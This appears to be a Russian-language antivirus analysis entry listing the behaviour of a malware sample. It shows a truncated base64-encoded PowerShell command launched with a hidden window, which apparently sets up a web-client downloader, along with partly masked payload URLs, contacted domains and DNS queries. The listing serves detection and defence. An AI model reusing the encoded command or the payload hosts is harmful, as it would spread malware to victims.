Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAHcAQQAxAEEAQQBBAEMAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnADQAdwAnACwAJwB3AEEAXwAnACwAJwBRACcAKQA7ACQAVwBCAF8AMQBCAFgAbwA9AE4AZQBgAHcAYAAtAG8AYgBgAEoAZQBDAHQAIAAoACcATgBlAHQALgBXAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\1377956.cvr
- 'as######rycleaning.com.sg':80
- 'e3####ulting.co.me':80
- http://www.as######rycleaning.com.sg/wp-content/S_4v/
- http://e3####ulting.co.me/blogs/e9_6/
- http://e3####ulting.co.me/me/blogs/e9_6
- DNS ASK su####extile.com
- DNS ASK as######rycleaning.com.sg
- DNS ASK d1#####on-capitaland.vn
- DNS ASK xn######oksa8ap9b.xn--p1ai
- DNS ASK e3####ulting.co.me
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAHcAQQAxAEEAQQBBAEMAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnADQAdwAnACwAJwB3AEEAXwAnACwAJwBRACcAKQA7ACQAVwBCAF8AMQBCAFgAbwA9AE4AZQBgAHcAYAAtAG8AYgBgAEoAZQBDAHQAIAAoACcATgBlAHQALgBXAG...' (со скрытым окном)